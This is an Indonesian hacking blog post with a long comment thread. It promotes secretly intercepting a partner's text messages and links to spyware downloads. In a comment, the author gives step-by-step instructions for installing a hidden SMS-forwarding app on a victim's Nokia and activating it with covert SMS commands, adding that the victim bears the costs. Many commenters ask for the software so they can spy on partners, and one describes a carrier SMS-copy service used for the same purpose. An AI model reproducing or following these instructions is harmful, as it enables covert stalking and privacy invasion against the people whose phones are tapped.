Blog nya Orang Bego

Cyber, Hacking, Tutorial, Virus,Anti Virus and more

SMS SPY (Sadap Sms Orang)

Posted by adixersoft pada 08/04/2009

pernah gak pacar lw selalu nyembunyiin hp nya? sms ngumpet-ngumpet?… mau tau doski sms apa aja? gw nemu cara nya ney… Menyadap sms lewat Internet dengan mendaftar ke http://www.bloove.com trus download file agent.sisx s60 pasang di hp yang akan di sadap… Gratis .

BUAT ADIZONNERS YANG PADA BILAnG LINK NYA MATI ATAU MINTA DI KIRIMIN KE EMAILNYA….BERHUBUNG BANYAK YANG MINTA INI SAYA KASIH LINK BARU….YANG PASTI NYA GAK KAN MATI NICH LINK……SILAHKAN DI COBA!!!! DAN HATI2 HP anda Telah di SPY oleh pasangan anda.. berikut link download atau link web serta penjelasanya ada di web link masing masing. Selamat menjadi mata-mata

1. http://www.smstrap.com/                           ===>> kalo yang ini cukup register

2. http://www.spymastertools.com/          ==>> kalo yang ini bayar gak geratis tapi lebih bagus

3.yang ketiga SMS spy hasil Upload tan gw……. pasti bisa di jalnin tinggal lo download aja

nich link nya : http://www.2shared.com/file/6350924/3cc66ad7/Spy_SMS_adizonnewordpresscon.html

Ok semuah nya mudah mudahan bermanfaat terimakasih ……

About these ads

75 Tanggapan to “SMS SPY (Sadap Sms Orang)”

  1. sayang HP-nya masih jadul, ga bsia disadap.. hehehe

  2. cokie said

    wah..rincian nya ga jelas boz..tlg yg jelas and detail..

    kirim ke email gw ya..
    an.harajuku@yahoo.com

  3. adixersoft said

    Kalo cara yang di atas emang sedikit untuk lebih detailnya dengan software yang berbeda kaya gini nich

    OK.. Pertama2x syaratnya :

    1. HP adalah HP symbian. Baik HP kamu maupun HP korban.
    2. HP Merek NOKIA
    3. Memiliki aplikasi symbian. Baik HP kamu maupun HP korban.

    Langkah2x nya seperti ini :

    1. Kita akan menggunakan aplikasi smsanywherelite.sis sbg software penyadapnya. Bisa di download disini :
    Code:

    http://rapidshare.com/files/199510713/Nemesis_SmsAnywhere_S60_2_0_v_1_4_1.SIS.html

    file nya kecil kok cuma 14 kb…

    2. Masukkan / install aplikasi symbian ini di HP kamu dan HP korban

    3. Begitu aplikasi ini diinstal, kamu tidak akan bisa melihat program tsb, begitu pula ikon aplikasi ini didalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Hal ini dikarenakan, aplikasi symbian ini belum mendukung GUI (Graphics User Interface).

    Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang korban tidak akan tahu kalau diponselnya telah dipasangi aplikasi tersebut. aplikasi symbian ini belum mendukung GUI (Graphics User Interface).

    4. Siapkan HP kamu dan HP korban

    5. Aktifkan aplikasi ini di ponsel korban dengan mengetik format sms :
    Quote:
    SA(spasi)(password)(spasi)ON
    Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketik:
    Quote:
    SA 123456 ON

    lalu kirim sms ini ke nomor ponsel kamu.
    Untuk mematikan / mengnonaktifkan aplikasi ini, ketik SA 123456 OFF lalu kirim ke nomor ponsel kamu.

    6. Langkah selanjutnya,

    Ketikkan sms ini di HP korban agar setiap sms yg masuk di HP korban akan selalu diteruskan ke HP kamu :
    Quote:
    SA(spasi)(password)(spasi)R1

    misal SA 1234567 R1

    sms ini ke nomor ponsel kamu.
    Untuk mematikan fungsi ini, ganti parameter di belakang “R” menjadi nol. Sehingga menjadi SA 1234567 R0.

    Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan :
    Quote:
    SA 1234567 S1

    dan kirim ke nomer ponsel kamu.
    untuk mematikan fungsi ini, dengan mengirim sms SA 1234567 S0

    7. Nah sekarang, setiap korban menerima dan mengirim sms, kamu akan mendapat terusannya sama persis dengan sms aslinya… keren kan…

    Selamat mencoba…

  4. fanatiCanz said

    WAwawakk. sedih banget yang jadi korban.. 1 sms diterima, bales 1 bayar nya 3!!!!

  5. Hohohoo ada juga yawh yang seperti itu..

    Saya mah lebih baik untuk diinstall di HP sendiri saja, biar kalo ada sms yang kehapus bisa dilihat lagi he he he….

    Thanks for the info yawh….

  6. adixersoft said

    Yupz……selamat mencoba mas??

  7. sparta said

    wah dah g bisa tuh link nya?

    ada yg punya software nya kah ?

    kirim ke email yah

    teravivisi@gmail.com

  8. ronny said

    boz numpang nanya beban pulsanya ditanggun penyadap ato yg disadap? misal korban sms ke org lain, kan kita jg terima sms nya si korban. Nah pulsa siapa yg terpotong? penyadap atau tersadap?? balas ya boz. thanks..

  9. ronny said

    boz numpang nanya beban pulsanya ditanggun penyadap ato yg disadap? misal korban sms ke org lain, kan kita jg terima sms nya si korban. Nah pulsa siapa yg terpotong? penyadap atau tersadap?? balas ya boz. thanks…

  10. ronny said

    boz link nya ga jalan tuh…?? gw butuh bgt neh.. gw curiga doi slingkuh main belakang ma gw… thx

  11. adixersoft said

    Biayanya di tanggung Sama Koraban bro…..

  12. ronny said

    bro link nya ga jalan tuh… gmna cara nya supaya gw bisa download? thx yahhhh sekali lg

  13. ronny said

    bisa bantu kirim ke email gw ga bro software nya ato file nya?
    thx before..

    telepon50@yahoo.com

  14. sofiono said

    aku download berulang kali kok tak bisa bisa ngapain ya, kalau ada yang punya tolonh kirimi aku, terimakasih sebelum dan sesudahnya

  15. ronny said

    bro koq ga bales?? bantu gw dapet software nya donk… thx bgt yahhh

  16. adixersoft said

    Cek email anda ronny dah di send

  17. zan said

    ribet banget musti harus instal,yg ga perlu instal ada g?trus kalo hpnya sonyericsson gmn?

  18. alysa said

    software nya ga jalan . gmna dong ?
    bisa kirim ke email aku ga ?

    renatavercillia@yahoo.com

  19. alysa said

    situs nya ga jalan . gimana dong?
    bisa kirim ke email ga ?

    renatavercillia@yahoo.com

    makasih ya :)

  20. adixersoft said

    @alll silahkan coba link baru nya di atas baru di tambahkan…semoga bermanfaat

  21. george kp said

    ada g software lengkap yg bisa byrnya di cicil g

  22. Dipa Wijaya said

    HP bokin gw Nokia 7500 Prisma, ada yang punya solusi untuk bisa gw sadap ga?tambahan, HP ini make Java.tengkiuuuu

  23. Anton said

    Buat isp ja. He..he..

  24. boss,…kl mau ngisi agent id nya, gmn? dari mana?

  25. kirim softwarenya donk..ke email saya : nana.daryana@yahoo.com

  26. deeblue said

    kok gak mau ya?????bisa kirim gak aplikasinya ke email ku…thxz

  27. sofie said

    knapa harus NOKIA, saya kan pecinta SE XD

  28. Ace said

    Klo bwt hp nokia 5300 aplikasi pa yg bsa bwt sdap sms?mhon pencerahan..

  29. Ace said

    Boz ditunggu jwbnnya,,..

  30. Mydestiny said

    Bro gag jln tu situs ny.,,
    krmin dunk yg bnr ke email q y..,

    itsmy_destiny95@yahoo.com

  31. hendra said

    koq software nya ga bsa download?? gmana nih, bsa ga tlg dkrim ke email ku.. mkasih.

  32. matt sima said

    bos tolong dong….gue ngga bisa karena rapidnya error tuh…bantuin dong

  33. Ogold said

    download file nya aja di sini:
    http://www.4shared.com/file/52523433/3105aa0/SmsAnywhere_S60_2_0_v_1_4_1.html?s=1
    semoga bermanfaat.

  34. andes said

    bos sy lg butuh sofwarex….. tolong dong kirim ke emailq
    andes.rias@yahoo.com

  35. rachy said

    Kirim ke email gw donk boz, gw download g bisa2..

    rachy_boyz24@yahoo.co.id

  36. Andrew said

    huuhh… !!!

    koq hrus Nokia sech.. !!! >,<
    ad gk yg bwt Motorola V3x sma Blackberry Curve and Bold, pokoke yg isa bwt Java Script… !! =,="

    aqu btuh bgt utk ngesadap HP Tmen qu =,="

    Please.. !! krimin ya.. ^_^

    niec Email na .. !!

    evy_sky@ovi.com

    ato

    andrewqrenz@gmail.com

    ato

    master_myweb@ymail.com

    please.. !! lgi btuh nie Y_Y"
    tlong bantuan na ya ??

    hehhehe…. btw Merry Christmas 2009 and Happy New Years 2010 ^_^

  37. zeta said

    http://www.ziddu.com/download/7888406/KUMPULAN_CERITA_LUCU.pdf.html

  38. doddyridwan said

    boss..bisa tolong dikirim ke email ak ga.link nya ga bs di buka..plese..siapa aja yg baca.

  39. matt sima said

    Aku udah coba yang Bloove .com…masalahnya kalo sms korban langsung dihapus tetep aja kita ngga bisa monitor…cara yang satu lagi aku coba tapi ngga bisa2 tuh…bantuin dong adixersoft

  40. Henry said

    bro, saya dl yg no 3…gimana cara penggunaan nya? install di hp korban…trus?????….mohon jawbannya ya bro…

  41. sofiono said

    mas kalau kita pakai smsanywhare, tetapi setelah kita lakukan langkah kan muncul sms masage SA 123456 ON dll setelah itu kita hapus apakah masih mau bejalan/masih bisa aktif terimakasih

  42. adit38 said

    Trik mantap mas, saya jg punya yg mirip:
    http://adit38.wordpress.com/2009/11/18/awas-penyadapan-sms/

  43. james said

    mau juga nih tolong donk bagi2 link nya oke???

  44. ajie said

    kalo sadap dari jarak jauh ga bs y? mksdnya ql target jauh & qt cm bs tau no tlp sm tipe & imei aj. gmn tu?

  45. rian said

    ADA GA YANG GA PAKE DI INSTAL DI HAPE KORBAN…JADI OTOMATIS BISA DILIHAT TANPA ADANYA PENGINSTALAN.

    KIRIM KE EMAIL KU YAH TRIMS

  46. yunus said

    gak jalan nih.

  47. fajar said

    aku sayang sama kamu2 .. saja keras kepala
    gak apa juga

  48. winne said

    klo sony bsa ga?

  49. fendy said

    kirimi aku aplikasinya dong.,
    ne emailQ

    fj_efendy@yahoo.com

  50. brengzekh said

    seperti mas rian:

    ADA GA YANG GA PAKE DI INSTAL DI HAPE KORBAN…JADI OTOMATIS BISA DILIHAT TANPA ADANYA PENGINSTALAN.

    KIRIM KE EMAIL KU YAH TRIMS

    terima kasih

  51. kakanda ivan said

    aku kurang jelas tentang pejelasan semua ini.
    tolong bisa diperjelas.

  52. fadhil said

    sy dah coba smstrap, cuman msalahnya sy hanya dpt 3 poin gratis tuk baca smsnya, nah gimna cr belinya atau dapatkan poin lagi?

    trus untuk yg no 3 (yang ketiga SMS spy hasil Upload tan gw……. pasti bisa di jalnin tinggal lo download aja

    nich link nya : http://www.2shared.com/file/6350924/3cc66ad7/Spy_SMS_adizonnewordpresscon.html )

    diatas td tutorialnya gmana? tolong infokan ke email aku yah

  53. Adrianus said

    Bisa kirimkan aplikasi untuk sadap sms HP SE, kartu simpati? Thanks sebelumnya

  54. Pangeran cinta said

    type hpnya apa aja ??
    c3 bisa ga ya ??

  55. Cusoy said

    Gak berfungsi 100% aplikasinya untk smsanywhere. Gimana tuh?

  56. agunk said

    mas tulung kirim yoo mas ke email ku.krena ak masih awam neng dunia internet.trimkasih

  57. Sheyoed said

    boss cara pakenya sms spy gmana toch..? aq udh donlot cuma cara pakenya gk ica..tolong di email panduannya..thx

  58. Jabrik said

    bro….tutor buat sms spy nya dunk….spy_sms_adizone nya udh di donlot…cuma trus nya gmana…

    kirim by email ya…thx

    deet4book@yahoo.com

  59. [...] dengan menggunakan applikasi ini link sms spy yg dulu [...]

  60. shinjie said

    wah bos adi kirimi softwarenya ke email saya ya..susah dapatnya hehehe kirim aja ya keemail ini Shinjie_edp@ymail.com makasih bos sebelumnya ^_^

  61. Agen 007 said

    ada gg ia sadap sms tanpa pakai software, hanya kita memantau hape korban lewat internet/PC ?
    pasti ada, tolong bantu carikan ya bos, biar gg ada pasangan yang dilema korban rahasia dari pasangannya

  62. Ilyas said

    1. Apa bisa kita menyadap SMS HP orang lain, tanpa menginstal Programnya ke HP korban lewat HP GSM kita.
    2. Apa ada program yg dapat dimonitor/disadap SMS orang lain, tanpa kita instal aplikasinya ke HP korban lewat PC/Laptop.

  63. Ilyas said

    Tolong dikirim ke Email saya.

  64. samizuaf said

    wah… bgus nih aplikasinya, tpi ada yg versi jar-nya g bwt ponsel java

  65. yogie_LF said

    kalo buat hp java sama E63 gmna ??

  66. Della said

    Iya bro, saya sudah donlod spy_sms_adizone. Tolong kirim ke email saya untuk cara2 penggunaannya.
    Thx before..

  67. Zainur said

    Kalo pasangan anda pake telkomsel tinggal ikut program sms copy aja.
    Caranya ketik MENU lalu kirim ke 2255
    setelah dapat sms balasan, pilih nmr 4, dgn cara balas sms dari 2255 dengan cara ketik 4 terus kirim.
    Selanjutnya ikuti petunjuknya.
    Cuma Rp.1000/bln, smua sms yg masuk di hp pasangan anda, akan masuk juga di hp anda.
    Semoga bermanfaat.

  68. nini said

    kl hp yg saya mw sadap pake hp sony ericson yang berbasis java bisa gk mas,tolong bantu saya

  69. jecko said

    bro..
    aq dah download lewat link yang no. 3..
    tapi bingung makenya..
    tolong penjelasan penggunaannya donk.. by e-mail ya.. thanx.. :)

  70. RjnaxCH said

    thanks bro ??

    gw msih Bingung Sdikit..????

    Tentang R1 dan R0

  71. alangrubadi said

    sadap sms tanpa harus megang hp org yg disadap bsa ga??
    hanya lewt no nya doank,,kl bs tuh pling canggih mnurut wa,,
    kl bs kc caranya lewat email wa yah,,hehehe

  72. alangrubadi said

    kl sadap sms atw tlpn tanp hrus pegang hp yg disadap bs ga,,,?

  73. bozz kalo hp cina bisa gak?sejenis (nexian)

  74. Irwansyah said

    Mentap

  75. aldi said

    bray klu hp bb ge manaa..??
    bisa gak yeaa…???

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
Ikuti

Get every new post delivered to your Inbox.

%d bloggers like this: